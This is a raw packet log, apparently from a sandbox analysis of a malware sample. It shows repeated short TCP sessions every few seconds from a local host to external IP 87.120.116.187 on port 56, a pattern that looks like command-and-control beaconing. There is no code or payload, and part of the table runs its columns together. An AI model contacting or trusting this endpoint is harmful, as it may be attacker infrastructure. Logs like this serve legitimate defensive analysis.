Jan 10, 2025 23:50:34.344099045 CET  49582        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:34.346014023 CET  49582        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:34.350759029 CET  56           49582      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:35.961519957 CET  56           49582      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:35.961595058 CET  49582        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:35.961628914 CET  49582        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:35.966656923 CET  56           49582      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:36.970204115 CET  49600        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:36.975060940 CET  56           49600      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:36.975423098 CET  49600        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:36.975796938 CET  49600        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:36.981097937 CET  56           49600      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:38.622155905 CET  56           49600      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:38.622266054 CET  49600        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:38.622302055 CET  49600        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:38.627032995 CET  56           49600      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:39.625777006 CET  49620        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:39.630583048 CET  56           49620      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:39.630666971 CET  49620        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:39.630932093 CET  49620        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:39.635742903 CET  56           49620      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:41.290616989 CET  56           49620      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:41.290683985 CET  49620        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:41.302303076 CET  49620        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:41.307055950 CET  56           49620      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:42.313246012 CET  49632        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:42.318109035 CET  56           49632      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:42.318201065 CET  49632        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:42.318500996 CET  49632        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:42.323344946 CET  56           49632      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:43.928210020 CET  56           49632      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:43.928318024 CET  49632        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:43.932322979 CET  49632        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:43.937077045 CET  56           49632      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:44.938354015 CET  49633        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:44.943232059 CET  56           49633      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:44.943327904 CET  49633        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:44.943595886 CET  49633        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:44.948327065 CET  56           49633      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:46.538727999 CET  56           49633      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:46.538809061 CET  49633        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:46.542706013 CET  49633        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:46.547513962 CET  56           49633      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:47.547648907 CET  49634        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:47.552593946 CET  56           49634      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:47.552752018 CET  49634        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:47.553051949 CET  49634        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:47.557876110 CET  56           49634      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:49.181278944 CET  56           49634      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:49.181400061 CET  49634        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:49.185086966 CET  49634        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:49.189843893 CET  56           49634      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:50.188374043 CET  49635        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:50.193315983 CET  56           49635      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:50.193428040 CET  49635        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:50.193711042 CET  49635        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:50.198555946 CET  56           49635      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:51.822364092 CET  56           49635      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:51.822586060 CET  49635        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:51.822643995 CET  49635        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:51.827426910 CET  56           49635      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:52.828805923 CET  49636        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:52.833605051 CET  56           49636      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:52.833684921 CET  49636        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:52.834032059 CET  49636        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:52.838816881 CET  56           49636      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:54.587162971 CET  56           49636      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:54.587322950 CET  49636        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:54.587322950 CET  49636        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:54.593518972 CET  56           49636      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:55.595412016 CET  49637        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:55.600578070 CET  56           49637      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:55.600759983 CET  49637        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:55.601320982 CET  49637        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:55.606281042 CET  56           49637      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:57.224379063 CET  56           49637      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:57.224498034 CET  49637        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:57.224597931 CET  49637        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:57.229525089 CET  56           49637      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:58.235146999 CET  49638        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:58.240082979 CET  56           49638      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:58.240195036 CET  49638        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:58.240530014 CET  49638        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:58.245398045 CET  56           49638      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:59.855084896 CET  56           49638      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:59.855235100 CET  49638        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:59.855334044 CET  49638        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:59.860888004 CET  56           49638      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:00.860400915 CET  49639        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:00.865297079 CET  56           49639      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:00.865420103 CET  49639        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:00.865767956 CET  49639        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:00.870589972 CET  56           49639      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:02.540677071 CET  56           49639      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:02.540811062 CET  49639        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:02.540883064 CET  49639        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:02.545653105 CET  56           49639      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:03.547825098 CET  49640        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:03.639132023 CET  56           49640      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:03.639296055 CET  49640        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:03.639656067 CET  49640        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:03.645308018 CET  56           49640      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:05.357570887 CET  56           49640      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:05.357635021 CET  49640        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:05.357675076 CET  49640        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:05.362622976 CET  56           49640      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:06.360186100 CET  49641        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:06.365046024 CET  56           49641      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:06.365181923 CET  49641        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:06.365467072 CET  49641        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:06.370254993 CET  56           49641      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:07.959070921 CET  56           49641      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:07.959156990 CET  49641        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:07.959655046 CET  49641        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:07.964407921 CET  56           49641      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:08.969413996 CET  49642        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:08.974324942 CET  56           49642      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:08.976521015 CET  49642        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:08.977045059 CET  49642        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:08.981831074 CET  56           49642      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:10.639801979 CET  56           49642      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:10.639854908 CET  49642        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:10.639902115 CET  49642        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:10.646471024 CET  56           49642      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:11.641380072 CET  49643        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:11.646167994 CET  56           49643      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:11.646276951 CET  49643        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:11.646605015 CET  49643        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:11.651478052 CET  56           49643      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:13.312731981 CET  56           49643      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:13.312804937 CET  49643        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:13.312836885 CET  49643        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:13.317795992 CET  56           49643      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:14.328979969 CET  49644        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:14.333906889 CET  56           49644      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:14.334062099 CET  49644        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:14.334285975 CET  49644        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:14.339157104 CET  56           49644      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:15.968238115 CET  56           49644      87.120.116.187   192.168.2.5
Jan 10, 2025 23:51:15.968455076 CET  49644        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:51:15.968508959 CET  49644        56         192.168.2.5      87.120.116.187
                                                                              Jan 10, 2025 23:51:15.975779057 CET564964487.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:16.985197067 CET4964556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:16.990262985 CET564964587.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:16.990430117 CET4964556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:16.990714073 CET4964556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:16.995662928 CET564964587.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:18.656265020 CET564964587.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:18.656378031 CET4964556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:18.656501055 CET4964556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:18.661313057 CET564964587.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:19.673131943 CET4964656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:19.678040981 CET564964687.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:19.679344893 CET4964656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:19.679619074 CET4964656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:19.684447050 CET564964687.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:21.291331053 CET564964687.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:21.291464090 CET4964656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:21.291497946 CET4964656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:21.296921015 CET564964687.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:22.297355890 CET4964756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:22.302402020 CET564964787.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:22.302495956 CET4964756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:22.302695036 CET4964756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:22.307475090 CET564964787.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:23.935597897 CET564964787.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:23.937527895 CET4964756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:23.937613010 CET4964756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:23.943193913 CET564964787.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:24.954890966 CET4964856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:24.959743977 CET564964887.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:24.959808111 CET4964856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:24.960040092 CET4964856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:24.964775085 CET564964887.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:26.588346004 CET564964887.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:26.589349985 CET4964856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:26.589378119 CET4964856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:26.594261885 CET564964887.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:27.594208956 CET4964956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:27.599261999 CET564964987.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:27.601324081 CET4964956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:27.601561069 CET4964956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:27.606340885 CET564964987.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:29.213165998 CET564964987.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:29.213243008 CET4964956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:29.213283062 CET4964956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:29.219908953 CET564964987.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:30.220091105 CET4965056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:30.225079060 CET564965087.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:30.225147963 CET4965056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:30.225641966 CET4965056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:30.230643034 CET564965087.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:31.835228920 CET564965087.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:31.835355997 CET4965056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:31.835388899 CET4965056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:31.840204954 CET564965087.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:32.851494074 CET4965156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:32.856395006 CET564965187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:32.859333992 CET4965156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:32.859651089 CET4965156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:32.864444017 CET564965187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:34.479023933 CET564965187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:34.479074955 CET4965156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:34.479147911 CET4965156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:34.483928919 CET564965187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:35.485507965 CET4965256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:35.490370989 CET564965287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:35.495367050 CET4965256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:35.495589018 CET4965256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:35.500344038 CET564965287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:37.140762091 CET564965287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:37.141346931 CET4965256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:37.145028114 CET4965256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:37.150731087 CET564965287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:38.157248020 CET4965356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:38.162072897 CET564965387.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:38.167346954 CET4965356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:38.167989016 CET4965356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:38.172816992 CET564965387.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:39.818578959 CET564965387.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:39.819370031 CET4965356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:39.821834087 CET4965356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:39.826725006 CET564965387.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:40.797442913 CET4965456192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:40.802299976 CET564965487.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:40.802378893 CET4965456192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:40.802584887 CET4965456192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:40.807358980 CET564965487.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:42.432051897 CET564965487.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:42.433936119 CET4965456192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:42.434026003 CET4965456192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:42.438792944 CET564965487.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:43.438024044 CET4965556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:43.442919970 CET564965587.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:43.443387032 CET4965556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:43.443660021 CET4965556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:43.448504925 CET564965587.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:45.039870024 CET564965587.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:45.043392897 CET4965556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:45.043426037 CET4965556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:45.051366091 CET564965587.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:45.954380035 CET4965656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:45.959220886 CET564965687.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:45.959405899 CET4965656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:45.959651947 CET4965656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:45.964428902 CET564965687.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:47.577769995 CET564965687.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:47.577863932 CET4965656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:47.577915907 CET4965656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:47.582724094 CET564965687.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:48.453810930 CET4965756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:48.460074902 CET564965787.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:48.460167885 CET4965756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:48.460410118 CET4965756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:48.466253996 CET564965787.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:50.148370028 CET564965787.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:50.148503065 CET4965756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:50.148557901 CET4965756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:50.153364897 CET564965787.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:51.000547886 CET4965856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:51.005503893 CET564965887.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:51.005641937 CET4965856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:51.005832911 CET4965856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:51.010601044 CET564965887.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:52.629239082 CET564965887.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:52.629297972 CET4965856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:52.631942987 CET4965856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:52.636842966 CET564965887.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:53.455555916 CET4965956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:53.460635900 CET564965987.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:53.463401079 CET4965956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:53.463654041 CET4965956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:53.468561888 CET564965987.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:55.085006952 CET564965987.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:55.085720062 CET4965956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:55.086632967 CET4965956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:55.091392994 CET564965987.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:55.875874043 CET4966056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:55.880809069 CET564966087.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:55.880877018 CET4966056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:55.881592989 CET4966056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:55.886328936 CET564966087.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:57.527904034 CET564966087.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:57.527966976 CET4966056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:57.528004885 CET4966056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:57.532782078 CET564966087.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:58.297482967 CET4966156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:58.302409887 CET564966187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:58.302628994 CET4966156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:58.302859068 CET4966156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:58.307732105 CET564966187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:59.938345909 CET564966187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:51:59.941384077 CET4966156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:59.941422939 CET4966156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:51:59.946419954 CET564966187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:52:00.695493937 CET4966256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:52:00.700544119 CET564966287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:52:00.700716019 CET4966256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:52:00.711060047 CET4966256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:52:00.715981007 CET564966287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:52:02.315401077 CET564966287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:52:02.315502882 CET4966256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:52:02.315536022 CET4966256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:52:02.320461988 CET564966287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:52:03.031955957 CET4966356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:52:03.036884069 CET564966387.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:52:03.037017107 CET4966356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:52:03.037348032 CET4966356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:52:03.042208910 CET564966387.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:52:04.634119987 CET564966387.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:52:04.634181976 CET4966356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:52:04.634277105 CET4966356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:52:04.639045954 CET564966387.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:52:05.328782082 CET4967156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:52:05.333837032 CET564967187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:52:05.335417986 CET4967156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:52:05.335735083 CET4967156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:52:05.340583086 CET564967187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:52:06.944479942 CET564967187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:52:06.944557905 CET4967156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:52:06.944588900 CET4967156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:52:06.949439049 CET564967187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:52:07.625678062 CET4967256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:52:07.630647898 CET564967287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:52:07.630762100 CET4967256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:52:07.631079912 CET4967256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:52:07.635925055 CET564967287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:52:09.280457973 CET564967287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:52:09.281644106 CET4967256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:52:09.281713009 CET4967256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:52:09.286535025 CET564967287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:52:09.938055992 CET4967356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:52:09.943078041 CET564967387.120.116.187192.168.2.5
Timestamp                            Src Port  Dst Port  Source IP       Dest IP
Jan 10, 2025 23:52:09.943165064 CET  49673     56        192.168.2.5     87.120.116.187
Jan 10, 2025 23:52:09.943519115 CET  49673     56        192.168.2.5     87.120.116.187
Jan 10, 2025 23:52:09.948374987 CET  56        49673     87.120.116.187  192.168.2.5
Jan 10, 2025 23:52:11.572880983 CET  56        49673     87.120.116.187  192.168.2.5
Jan 10, 2025 23:52:11.573786974 CET  49673     56        192.168.2.5     87.120.116.187
Jan 10, 2025 23:52:11.573838949 CET  49673     56        192.168.2.5     87.120.116.187
Jan 10, 2025 23:52:11.578732967 CET  56        49673     87.120.116.187  192.168.2.5
